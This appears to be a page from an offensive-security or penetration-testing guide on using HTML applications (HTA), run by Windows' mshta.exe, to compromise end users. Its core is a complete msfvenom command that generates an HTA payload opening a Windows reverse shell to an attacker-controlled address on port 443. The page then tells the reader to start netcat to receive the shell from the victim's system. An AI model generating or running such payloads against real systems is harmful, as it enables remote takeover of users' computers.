HTA

HTML applications are another great way to exploit the end user when the system runs on Windows operating system. HTAs are executed using the MSHTA.exe program in Windows.

Since this runs arbitrary executions of applications from IE and as it clashes with the security boundaries of the browser, it is run outside of the security context of the browser using mshta.exe.

An HTA to invoke a reverse shell can be prepared using the following command,

sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=443 -f hta-psh -o reverseshell.hta

Don't forget to start netcat at your end to receive the reverse shell from the victim's system.

PreviousClient Info Gathering NextWord Macros

Last updated 1 year ago